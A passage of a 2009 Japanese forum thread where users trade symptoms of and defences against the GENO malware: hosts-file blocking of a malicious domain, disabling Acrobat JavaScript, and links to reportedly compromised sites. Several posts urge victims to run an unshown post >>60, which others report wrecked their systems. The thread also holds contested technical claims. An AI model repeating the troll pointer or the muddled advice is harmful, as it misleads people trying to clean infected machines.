118名無しさん@お腹いっぱい。:2009/05/28(木) 01:44:00
>>60やったらぶっ壊れた
119名無しさん@お腹いっぱい。:2009/05/28(木) 02:18:45
書き込み出来てるじゃねぇか。
ちなみにscrファイルを書き換えさせてるわけではないので、regedit.exeをregedit.scrにリネームして復元するべし。
120名無しさん@お腹いっぱい。:2009/05/28(木) 04:17:49
>>60
って誰でもあるの?削除して大丈夫なの?
121名無しさん@お腹いっぱい。:2009/05/28(木) 04:48:48
誰でもある。
削除したらだめ。
122名無しさん@お腹いっぱい。:2009/05/28(木) 05:48:23
楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
http://tsushima.2ch.net/test/read.cgi/news/1243425827/
123名無しさん@お腹いっぱい。:2009/05/28(木) 06:30:41
Genoウイルスの感染メカニズム【前編】(Scan) - Yahoo!ニュース
(5月27日18時38分配信)
http://headlines.yahoo.co.jp/hl?a=20090527-00000010-vgb-secu
124名無しさん@お腹いっぱい。:2009/05/28(木) 09:19:31
自動アップデートが無効になってオーディオデバイスが無しになってマイクロソフトとか特定のサイトにアクセスできなくなるんだけどこれって感染してる?
125名無しさん@お腹いっぱい。:2009/05/28(木) 10:01:12
126名無しさん@お腹いっぱい。:2009/05/28(木) 10:38:09
hosts
127名無しさん@お腹いっぱい。:2009/05/28(木) 10:45:35
失礼
hostsファイル開いてみそ
127.0.0.1localhost
(127.0.0.1をローカルホストにする)
の記述の後に、
マイクロソフトやアンチウィルス系の
ドメインごちゃまんと追加されてるよ、きっと
128名無しさん@お腹いっぱい。:2009/05/28(木) 11:05:33
ようつべの動画にリンク貼ったりしない方がいいのでしょうか
129名無しさん@お腹いっぱい。:2009/05/28(木) 11:42:30
つべやにこにこは、ほぼ最新ver.のFlash Player
でないと見られないんじゃないかな
逆に言うと、見られる人はFlash Playerから
感染する可能性が少ない
投稿された動画自体が汚染されてる可能性は、
自分にはわからない

問題はacrobatよな
告知情報見るまで、acrobat readerにjs使えるなんて
知らなかったものw
130名無しさん@お腹いっぱい。:2009/05/28(木) 11:57:23
>>129

ありがとうございました。
131名無しさん@お腹いっぱい。:2009/05/28(木) 12:09:49
こう言う自己判断できない屑が動画サイト使うから動画サイト=キチガイと厨の巣、犯罪者予備軍の巣と言う感じ
132名無しさん@お腹いっぱい。:2009/05/28(木) 12:25:35
日本は、いやアジアは、いや地球はキチガイと厨の巣、犯罪者予備軍の巣だな
133名無しさん@お腹いっぱい。:2009/05/28(木) 12:28:56
>>132
あなたの祖国と日本を一緒にしないでいただきたい
134名無しさん@お腹いっぱい。:2009/05/28(木) 12:37:26
>>60やったらregeditやcmdが起動しなくなりました
さらにexplorerも起動しなくなりデスクトップには壁紙だけしか表示されなくなりました
osはvistaです

ちなみにデスクトップの壁紙は外人ニューハーフの裸体(完全無修正)で
アイコンをぎっしり詰めて分からない様にカモフラージュしてました
135名無しさん@お腹いっぱい。:2009/05/28(木) 12:41:17
12点
136134:2009/05/28(木) 12:52:55
自己解決しました。
137名無しさん@お腹いっぱい。:2009/05/28(木) 13:19:47
次スレいらないな。
138名無しさん@お腹いっぱい。:2009/05/28(木) 13:28:03
GENO社員乙
139名無しさん@お腹いっぱい。:2009/05/28(木) 13:38:59
携帯でGENOウイルスのURL踏んじゃったんだけど、
携帯にも影響あるの?
140名無しさん@お腹いっぱい。:2009/05/28(木) 13:44:03
>>139
クリーンインストール
141名無しさん@お腹いっぱい。:2009/05/28(木) 13:49:03
おいおまいら

俺のケツの穴見たいか?
糞ひねり出すとこ見たいか?
142名無しさん@お腹いっぱい。:2009/05/28(木) 13:49:08
>>140
え、あるの・・・?
データ流出とかはないよな・・・
143名無しさん@お腹いっぱい。:2009/05/28(木) 14:27:45
>>142

>>140
> え、あるの・・・?
> データ流出とかはないよな・・・
144名無しさん@お腹いっぱい。:2009/05/28(木) 14:28:30
cmc確認、regedit確認、sqlsodbc.chmのファイルサイズ確認
nortonは普通に起動している、windowsupdateにもアクセス可能。
symantecにもアクセスできる。MD5も一致した。

問題なしですよね?
145名無しさん@お腹いっぱい。:2009/05/28(木) 14:42:22
asahi.com(朝日新聞社)

新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
ttp://www.asahi.com/digital/digitre/TKY200905250299.html
146名無しさん@お腹いっぱい。:2009/05/28(木) 15:46:39
いまだに騒いでるのは同人屋だけだと思ってた
147名無しさん@お腹いっぱい。:2009/05/28(木) 16:08:49
>>144
不安があるならクリーンインストール
148名無しさん@お腹いっぱい。:2009/05/28(木) 16:24:15
「GENOウイルス」

朝日新聞社のお墨付き
149名無しさん@お腹いっぱい。:2009/05/28(木) 16:28:56
>>144
そこまで確認して不安ならOS再インスコ汁
150名無しさん@お腹いっぱい。:2009/05/28(木) 16:43:50
終了
151名無しさん@お腹いっぱい。:2009/05/28(木) 16:44:17
まだまだ続くよ〜!
152名無しさん@お腹いっぱい。:2009/05/28(木) 17:11:01
Windows2000の場合でも、
Visual Studio 6 SP5 以降のバージョン、Microsoft SQL Server 2000、.NetFramework 1.1
等がインストールされている場合にはMDAC 2.6〜2.8 がインストールされているので
sqlsodbc.chm が存在する。
Office 2003をインストールしている場合もsqlsodbc.chm が存在してる可能性が有り。


通常は、Windows2000には同じsqlsodbcでもchmファイルではなく、 hlpファイルが常時存在し、
こちらは16.7 KB (17148 バイト) 、MD5:3177C8154F1011535FDD1B1B30D3D2E9

50727バイトじゃない!MD5:F639AFDE02547603A3D3930EE4BF8C12じゃない!感染してる!
と勘違いしてクリーンインストールしちゃった人が多そう・・・
153名無しさん@お腹いっぱい。:2009/05/28(木) 17:22:01
>>152
chmファイルとhlpを見間違うのはマヌケ
クリーンインストールも止むを得なす
154名無しさん@お腹いっぱい。:2009/05/28(木) 17:27:10
cmd、regeditが起動できてsqlsodbc.chmも改変されてなくて
特定のサイトにアクセスできないんだけどこれって感染してる
あと隠しファイルも表示できない
155名無しさん@お腹いっぱい。:2009/05/28(木) 17:28:55
>>154
あたしエスパーだけどOS入れなおせばおk
156名無しさん@お腹いっぱい。:2009/05/28(木) 17:31:26
今やってる
157名無しさん@お腹いっぱい。:2009/05/28(木) 17:39:03
>>154
面倒だからOS再インスコ
158名無しさん@お腹いっぱい。:2009/05/28(木) 17:49:16
さっきまで、まとめサイトのメニューに「稲川淳二」って項目があったけど、なんだったんだろう。
159名無しさん@お腹いっぱい。:2009/05/28(木) 17:51:09
>>158
なにそれ?w なんで稲川淳二が・・・
160名無しさん@お腹いっぱい。:2009/05/28(木) 18:01:48
バスターがアップデートできないんだけど…
これもGENO?
161名無しさん@お腹いっぱい。:2009/05/28(木) 18:06:08
>>154
以前からそうならルータの問題の可能性も有
162名無しさん@お腹いっぱい。:2009/05/28(木) 18:12:24
先週再インスコした時は平気だった
163名無しさん@お腹いっぱい。:2009/05/28(木) 18:15:08
>>160
聞く前にちゃんと自分で調べようぜ!
164名無しさん@お腹いっぱい。:2009/05/28(木) 18:46:38
>>160
期限切れてるんじゃね
165名無しさん@お腹いっぱい。:2009/05/28(木) 19:27:47
新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
ttp://www.asahi.com/digital/digitre/TKY200905250299.html
166名無しさん@お腹いっぱい。:2009/05/28(木) 20:23:14
GENOウイルス何って4月ごろに騒いでた奴だろ?

亜種も出て随分たってるのに
いまだに新マルウエアとか言ってるのか…
167名無しさん@お腹いっぱい。:2009/05/28(木) 20:38:19
>>154
会社でフィルタリングかけてんじゃね
168名無しさん@お腹いっぱい。:2009/05/28(木) 20:49:02
はいはいhostsファイル見て
トレンドマイクロがブロックされてたら
削ってね〜
169名無しさん@お腹いっぱい。:2009/05/28(木) 22:56:40
終わったね
170名無しさん@お腹いっぱい。:2009/05/28(木) 23:01:47
まだまだ続くよ〜!
と言いたいけど終わったね
171名無しさん@お腹いっぱい。:2009/05/28(木) 23:07:32
今回を機にセキュリティーに目覚めたっつか、自分のPCを見つめ直す
機会にはなったんじゃないかな
操ってるのはあくまでも『人間』なんだしな
172名無しさん@お腹いっぱい。:2009/05/28(木) 23:30:24
obfuscationがさらに高度になってきてるな
173名無しさん@お腹いっぱい。:2009/05/28(木) 23:33:14
そうかそうか
174名無しさん@お腹いっぱい。:2009/05/28(木) 23:54:18
ヴィスタだけどCPU使用率が異常なことになってる
これやばくないか
175名無しさん@お腹いっぱい。:2009/05/28(木) 23:58:18
低スペック+AERO有効
176名無しさん@お腹いっぱい。:2009/05/28(木) 23:59:44
ははっ わろす
177名無しさん@お腹いっぱい。:2009/05/29(金) 00:00:23
いや今まで使用率なんて何も触ってなけりゃ3%前後なのに
常にコア1が90%ぐらいになってる
178名無しさん@お腹いっぱい。:2009/05/29(金) 00:01:09
見に覚えがないなら(UAC無視してないなら)
sqlsodbc確認、ウィルススキャン&HijackThisのようなソフトで起動プロセスチェックして
問題なければ再起動して様子を見る
179名無しさん@お腹いっぱい。:2009/05/29(金) 00:02:28
アンチウィルスFWソフトもたまに暴走するからな
例えば、ウィルスバスターとかウィルスバスターとかウィルスバスターとか!
180名無しさん@お腹いっぱい。:2009/05/29(金) 00:07:08
バスターは自分をバスターし始める
181名無しさん@お腹いっぱい。:2009/05/29(金) 00:07:34
ウィルスバスターかもしれんw

>>178
sqlsodbcってVistaに存在してる?
182名無しさん@お腹いっぱい。:2009/05/29(金) 00:09:26
183名無しさん@お腹いっぱい。:2009/05/29(金) 00:13:08
システムファイルの発見はCドライブごと検索するようこころがけるだけでこんなつまらんレスはなくなるだろう
184名無しさん@お腹いっぱい。:2009/05/29(金) 00:16:09
始まったな
185名無しさん@お腹いっぱい。:2009/05/29(金) 00:19:26
>>131
お前は人間失格だな
少しは>>127さんを見習え
186名無しさん@お腹いっぱい。:2009/05/29(金) 00:21:55
掘り返すなよ・・
187172:2009/05/29(金) 00:22:49
いやあ、俺の発見したサイトはユーザーブロッキング機能によって
2度目の攻撃は行わないようになってたわ
察知されにくいようにしてるな
188名無しさん@お腹いっぱい。:2009/05/29(金) 00:24:23
ウイルスバスターって人気ですね!
189名無しさん@お腹いっぱい。:2009/05/29(金) 00:25:45
人気ですが、何か
190名無しさん@お腹いっぱい。:2009/05/29(金) 00:27:30
バスター?

妨害攻撃で撃沈されてしまうけどね
191172:2009/05/29(金) 01:06:32
いやあ、入手した検体アンチオンラインスキャン、アンチリバースエンジニアリング、
アンチVMなどのアンチ仮想環境すべてかかってるわ
192名無しさん@お腹いっぱい。:2009/05/29(金) 01:15:02
感染して、先ほどリカバリした漏れです。

ふと思ったんだけれど、ファイアウォール導入してもGENOには無効?
193名無しさん@お腹いっぱい。:2009/05/29(金) 01:16:08
終了
194名無しさん@お腹いっぱい。:2009/05/29(金) 01:26:01
195172:2009/05/29(金) 01:55:46
>>192
うん、無効

HIPS入れてかろうじて何とかなるかならないか
196名無しさん@お腹いっぱい。:2009/05/29(金) 03:11:32
誰でも出来る簡単な対策

Vista使いましょう
197名無しさん@お腹いっぱい。:2009/05/29(金) 03:21:53
つーか、使ってるAdobeを最新にしていればとりあえず今は大丈夫なんでそ?
198名無しさん@お腹いっぱい。:2009/05/29(金) 03:24:44
あとjsの無効
jsでとばされる先の感染サイトがあったドメインへの
アクセス制限(暫定)
199名無しさん@お腹いっぱい。:2009/05/29(金) 03:27:36
それは、Adobe Readerのjavascript設定限定での話?
それともブラウザ自体のscriptも常時切らないと駄目なのか(切らないと完全アウトかどうか)?
200名無しさん@お腹いっぱい。:2009/05/29(金) 03:32:54
201名無しさん@お腹いっぱい。:2009/05/29(金) 03:38:31
テンプレは特定のブラウザの導入とPDF、flashとjsの無効を推奨しているように見えるし不便過ぎる(firefoxが何たらの項。)
もう感染してもいいから自分のお気に入りのサイトくらいは許可するよ
楽天で個人情報既に抜かれてるし自サイト(ブログ放置くらい)、カードないし別にいいや
202名無しさん@お腹いっぱい。:2009/05/29(金) 03:41:52
>>199
現在のところはAdobe Reader側だけでOK。
ブラウザ側も保険として勧められているだけ。
203名無しさん@お腹いっぱい。:2009/05/29(金) 03:55:54
Genoよりエロゲ規制の方が数倍恐いわ
204名無しさん@お腹いっぱい。:2009/05/29(金) 04:17:35
ここ ↓ やられてるのかな?反応して遮断するんだけど、「ハリスの太さ」で検索してたらあった。

グレ、チヌの視力でハリスは見えるのかとマキエの摂取量
ttp://www.geocities.co.jp/Outdoors-Mountain/8003/gure_tinu-siriyoku.htm
205名無しさん@お腹いっぱい。:2009/05/29(金) 04:27:07
>>204
やられてるねえ
martuz●cn行き
206名無しさん@お腹いっぱい。:2009/05/29(金) 04:31:38
martuzは停止してるんじゃなかったっけ
207名無しさん@お腹いっぱい。:2009/05/29(金) 04:34:09
たぶんね
改竄されてるかどうかとは関係ないけど
208204:2009/05/29(金) 04:50:53
そうなんだ、やられていたか
俺みたいに行動範囲の狭い人間ですらぶち当たるってことは
相当ひどいってことだな
こりゃ気をつけにゃいかんわ
ありがと

209名無しさん@お腹いっぱい。:2009/05/29(金) 05:34:33
見つけたんだったらここで報告するより
サイト管理者に連絡してあげたらいいのに
何がしたいんだ

ま、まさか 釣り とか
210名無しさん@お腹いっぱい。:2009/05/29(金) 05:39:18
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す

↑これは英語版ではどこをどう選んだらいいのでしょうか?
adobe reader9入れてから日本語パッチあてたり出来るんでしょうか?
211210 :2009/05/29(金) 06:04:19
日本語版入れなおしました
adobe javascript=acrobat javascriptでおkなのでしょうか?
adobe javascriptなる項目が存在せずacrobat javascriptというのがあるのですが
212210 :2009/05/29(金) 06:38:37
自己りますた
213名無しさん@お腹いっぱい。:2009/05/29(金) 07:26:49
>>201
こうゆうヤツが普通にいるからネットは免許制&過失罪制度が必要なんだよ
自分の利便性最優先とか、どんだけ非社会的なんだよ
214名無しさん@お腹いっぱい。:2009/05/29(金) 07:33:28
yabeeeesqlsodbc.chmが0byteになってた
ちゃんと最新のに変えてjavaも切ってたのに何でだ
215名無しさん@お腹いっぱい。:2009/05/29(金) 07:41:16
0byte化報告は前にもみたな
genoっていうか、別物に感染したんじゃないか?
216名無しさん@お腹いっぱい。:2009/05/29(金) 08:49:10
acrobatやflashの脆弱性を付いてクラッシュさせることで初めてパスなんかを盗むウィルスなんだから
JAVAスクリプトがONかOFFかはあんまり関係なさそうだな
217名無しさん@お腹いっぱい。:2009/05/29(金) 08:56:37
>>216
クラッシュはsniffing動作と関係ないだろ。
218名無しさん@お腹いっぱい。:2009/05/29(金) 08:57:59
クラッシュさせるサイトにとばすのに
js使ってるんでないの?
だからFireFoxのリンク先の画像先読みする機能を
オフにする話が出ると思った
219名無しさん@お腹いっぱい。:2009/05/29(金) 09:20:31
修正案
■ adobe readerを9.1.0にアップデートする
とりあえず最新版にしましょう。

220名無しさん@お腹いっぱい。:2009/05/29(金) 09:24:47
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp
221名無しさん@お腹いっぱい。:2009/05/29(金) 09:40:08
以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
222名無しさん@お腹いっぱい。:2009/05/29(金) 09:42:18
動画サイトは見ない方が良いのか
223名無しさん@お腹いっぱい。:2009/05/29(金) 09:49:57
対策してればどんどんみれ
224名無しさん@お腹いっぱい。:2009/05/29(金) 09:52:19
Noscriptでjsを一時的に許可にしないと動画見れないし
225名無しさん@お腹いっぱい。:2009/05/29(金) 09:58:18
■ hostsファイル書き換え
はいらんなmartuzはしんでる
感染するなら他のアドレスだしそれの予測は困難
この書き換えでブロックしようってのは現実的じゃない
226名無しさん@お腹いっぱい。:2009/05/29(金) 10:01:32
むしろ、新しい感染先が分かったら
その都度どんどん書き加えていけばと思う
227名無しさん@お腹いっぱい。:2009/05/29(金) 10:14:41
QTにも脆弱性見つかってるから近い内導入される悪寒
228名無しさん@お腹いっぱい。:2009/05/29(金) 10:59:26
新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
ttp://www.asahi.com/digital/digitre/TKY200905250299.html
229名無しさん@お腹いっぱい。:2009/05/29(金) 11:21:15
まともな文章だが
230名無しさん@お腹いっぱい。:2009/05/29(金) 11:26:30
ウィルスではなく、ウイルスなのは知ってるが、マルウェアがマルウエアだとは知らなかったなwww
231名無しさん@お腹いっぱい。:2009/05/29(金) 11:32:22
所詮英語だからどう書こうがいい

232名無しさん@お腹いっぱい。:2009/05/29(金) 11:33:34
>>231
ウィルスは英語読みじゃないぞ。
233名無しさん@お腹いっぱい。:2009/05/29(金) 11:34:52
ビールスしかみとめません
234名無しさん@お腹いっぱい。:2009/05/29(金) 11:37:38
小さいィェォは大きく書くこと多い
ウィルス→ウイルス
フィルム→フイルム
トェェェェイ→トエエエエイ
235名無しさん@お腹いっぱい。:2009/05/29(金) 11:38:09
ヴァイラスで
236名無しさん@お腹いっぱい。:2009/05/29(金) 12:28:46
新しい感染先は
netstatでわかんねーかな
セッション貼られてるの一瞬かなー
237名無しさん@お腹いっぱい。:2009/05/29(金) 13:14:36
http://search.yahoo.co.jp/search?p=http%3A%2F%2Fharu0425.h.fc2.com%2F&ei=UTF-8&fr=moz2&rls=org.mozilla:ja-JP:official
この検索で出るサイト、トップ頁以外1000%だな。ソースも確認したが、黒。

結構有名なエロ小説サイトだからヤバイと思うわ。エロ小説サイトめぐりが趣味な人は気をつけろ。
238名無しさん@お腹いっぱい。:2009/05/29(金) 13:33:40
adobe javascriptはadobe readerを9.1.1にはないから...
239名無しさん@お腹いっぱい。:2009/05/29(金) 13:42:54
無理せずに英語で書いていいぞ
240名無しさん@お腹いっぱい。:2009/05/29(金) 13:44:11
>>239
いやああ〜〜〜
241名無しさん@お腹いっぱい。:2009/05/29(金) 13:57:42
sqlsodbc.chmが0byteになってたんでハッシュ値を確認しようと思ったらファイル自体が破損してるのか確認すら出来なかった
Windows Updateにも繋がるしアンチウィルスもしっかり更新できる、cmdもregeditも立ち上がるし、そもそもadobe関連は全部最新のものに変えているしjavaは切ってある
一応カスペとNODとavastで別種のウィルスかと検索してみたがgenoは元よりナニも検出されない
一体なんだったんだろう おしえておじいさん
242名無しさん@お腹いっぱい。:2009/05/29(金) 14:14:37
Java≠JavaScript
243名無しさん@お腹いっぱい。:2009/05/29(金) 14:18:07
JavaとJavaScriptを混同してる奴を見ると、鼻の穴にパチンコ玉を突っ込んで
やりたくなるよな。それも両方の穴に3つずつ、奥までみっちり詰め込んで
やりたい。
244名無しさん@お腹いっぱい。:2009/05/29(金) 14:20:13
>>243
いいから次スレはテンプレ修正しとけってw
245名無しさん@お腹いっぱい。:2009/05/29(金) 14:29:38
そこまでやって、hostsファイルの改ざんだけは
頑なに調べないのは何でだろう
246名無しさん@お腹いっぱい。:2009/05/29(金) 14:41:06
>>204
危ないから運営に通報しといたよ
247名無しさん@お腹いっぱい。:2009/05/29(金) 14:49:42
困った時は>>60
事前予防は>>60
248名無しさん@お腹いっぱい。:2009/05/29(金) 14:50:35
キチガイが起きてきたみたいだな
249名無しさん@お腹いっぱい。:2009/05/29(金) 15:21:50
※>60は実行しないでください。
250名無しさん@お腹いっぱい。:2009/05/29(金) 15:26:46
病気にかからない方法の一つ
・あらかじめ死んでおく
ってことかなw
251名無しさん@お腹いっぱい。:2009/05/29(金) 16:27:07
2ヶ月前amzonに注文したブツが一昨日か昨日が配送予定日になってるのに
確認メールが来なかった忘れてるのだろうか・・それとももしや・・
252名無しさん@お腹いっぱい。:2009/05/29(金) 16:32:36
>>251
私がおいしく頂きました。
253名無しさん@お腹いっぱい。:2009/05/29(金) 16:33:16
amazonは問題ないが、、ほしいものリストは罠なので気をつけるように
254名無しさん@お腹いっぱい。:2009/05/29(金) 17:31:42
1修正案

■ adobe readerを9.1.0にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
(readerのバージョン、フラッシュのリンク)
>>6
255名無しさん@お腹いっぱい。:2009/05/29(金) 18:21:54
>>254
GJ。賛同です。
256名無しさん@お腹いっぱい。:2009/05/29(金) 18:30:20
>>2の確認方法じゃ危険なの?
257名無しさん@お腹いっぱい。:2009/05/29(金) 18:47:11
>>254
adobe javascript→acrobat javascript
258名無しさん@お腹いっぱい。:2009/05/29(金) 18:50:13
最近、楽天にしか登録してないメールアドレスにスパムが届くという話があるが
GENOウィルスが騒がれだしたのは楽天にショップがある所からだよね?
メールアドレスも抜き出すんじゃないのコレ?
259名無しさん@お腹いっぱい。:2009/05/29(金) 18:53:08
いつのスレかは忘れたが、不発のときに、コマンドの起動がトリガーになり得る
という話はあった。確認方法は>>3が確実なら、それで十分なのでは。
260名無しさん@お腹いっぱい。:2009/05/29(金) 19:10:53
結局genoウイルスチェッカーは信頼できないんか
261名無しさん@お腹いっぱい。:2009/05/29(金) 19:11:01
cmd、regeditでトリガーって
もう既に不発じゃないいんじゃない
262名無しさん@お腹いっぱい。:2009/05/29(金) 19:12:30
100%で確実じゃないとか頭おかしいでしょ
263名無しさん@お腹いっぱい。:2009/05/29(金) 19:15:00
>>254
Adobe Readerの最新版は9.1.1だろ。
264名無しさん@お腹いっぱい。:2009/05/29(金) 19:19:09
>>6
9.1.0でGENOの対処は終わってます
最新版は将来変わるので
バージョンは書かないで最新版にあげろとだけで
265名無しさん@お腹いっぱい。:2009/05/29(金) 19:20:20
>>264
adobe javascript→acrobat javascriptにいい加減書き換えろボケ
266名無しさん@お腹いっぱい。:2009/05/29(金) 19:21:10
hostsに追加おまけリスト(127.0.0.1 martuz.cnも入ってるよん)
ttp://www1.axfc.net/uploader/Sc/so/5031.zip
DL:GENO
267名無しさん@お腹いっぱい。:2009/05/29(金) 19:22:30
1修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
(readerのバージョン、フラッシュのリンク)
>>6
268名無しさん@お腹いっぱい。:2009/05/29(金) 19:34:36
>>263
だね 手動でupdateしないと9.1.1にならないよね
269名無しさん@お腹いっぱい。:2009/05/29(金) 19:34:44
>>254,>>267
9.1.0になるのでアップデートかけて9.1.1にしろと書いとけよ > Reader
270名無しさん@お腹いっぱい。:2009/05/29(金) 19:43:02
9.1.0でGENOの対処は終わってます
271名無しさん@お腹いっぱい。:2009/05/29(金) 19:44:09
>>270
終わってないぜ。9.1.1にしないと無意味。
272名無しさん@お腹いっぱい。:2009/05/29(金) 19:44:57
終わってる
まとめでなんでこんなデマ書いてんだか
273名無しさん@お腹いっぱい。:2009/05/29(金) 19:47:54
どっちだ?最新は9.1.1なんだから、それでいいじゃん
274名無しさん@お腹いっぱい。:2009/05/29(金) 19:48:08
15 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/23(土) 04:04:44
ttp://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html
このバグなら 9.1.0で修正済み
9.1.0では駄目ってのはどっからでてきたわけ

16 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/23(土) 04:09:49
genoが突いてくるセキュリティホールは9.1.0で直ってるよ
9.1.1は別のセキュリティホール
275名無しさん@お腹いっぱい。:2009/05/29(金) 19:51:08
1修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
276名無しさん@お腹いっぱい。:2009/05/29(金) 19:55:38
どこまでGENOというかだが
9.1.0にある脆弱性ついたのまだないのかな
とりあえず最新版にしとけでいい
バージョン表記はいらん
277名無しさん@お腹いっぱい。:2009/05/29(金) 20:02:20
同感
278名無しさん@お腹いっぱい。:2009/05/29(金) 20:02:29
>>275
おつかれさまでした
279名無しさん@お腹いっぱい。:2009/05/29(金) 20:05:47
Adobe製品なぞ全削除推奨
280名無しさん@お腹いっぱい。:2009/05/29(金) 20:06:27
PDFは妥協するとしてFlashはさすがに無理無理
281名無しさん@お腹いっぱい。:2009/05/29(金) 20:07:10
1修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

hostsに追加おまけリスト(127.0.0.1 martuz.cnも入ってるよん)
ttp://www1.axfc.net/uploader/Sc/so/5031.zip
DL:GENO
282名無しさん@お腹いっぱい。:2009/05/29(金) 20:11:21
追加>60
283名無しさん@お腹いっぱい。:2009/05/29(金) 20:13:44
shine
284名無しさん@お腹いっぱい。:2009/05/29(金) 20:31:05
>>276
それだと自称最新版ちゃんが出てきちゃうから
バージョン表記は必要だとおもうよ
285名無しさん@お腹いっぱい。:2009/05/29(金) 20:33:41
9.1.1が最新だーよ
286名無しさん@お腹いっぱい。:2009/05/29(金) 20:37:49
そうあるよ
287名無しさん@お腹いっぱい。:2009/05/29(金) 20:49:15
288名無しさん@お腹いっぱい。:2009/05/29(金) 20:53:08
>>284
>インストール後本体をアップデートしておく事
>adobe readerを開いて ヘルプ→アップデートの有無をチェック

↑がテンプレ修正案に入ってるからバージョン表記は無くていいよ。
289名無しさん@お腹いっぱい。:2009/05/29(金) 21:14:35
また特定のサイトにアクセスできなくなった昨日再インスコしたばっかりなのに
290名無しさん@お腹いっぱい。:2009/05/29(金) 21:20:47
>>289
>>60を実行するんだ
291名無しさん@お腹いっぱい。:2009/05/29(金) 21:27:44
Adobe Readerはインストール時にReader SpeedUpで
広告からスクリプト関連まですべて削除しとくといい。
あとで必要になったらデフォルト状態にすぐに戻せるし
起動も読み込みも爆速になる
292名無しさん@お腹いっぱい。:2009/05/29(金) 21:33:31
9系は起動遅くないような
293名無しさん@お腹いっぱい。:2009/05/29(金) 21:44:21
>>254
adobe readerの最新版入れたはずなんですが9.1.1になってるのっておかしいですか
294名無しさん@お腹いっぱい。:2009/05/29(金) 21:45:54
マトリックスゴイ
